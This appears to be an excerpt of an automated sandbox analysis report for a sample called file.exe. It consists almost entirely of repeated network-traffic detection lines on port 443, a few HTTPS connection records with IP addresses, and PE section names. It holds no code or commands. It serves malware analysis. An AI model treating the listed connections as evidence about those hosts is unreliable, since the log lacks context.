              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
              Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
              Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49758 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.7:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.7:50082 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
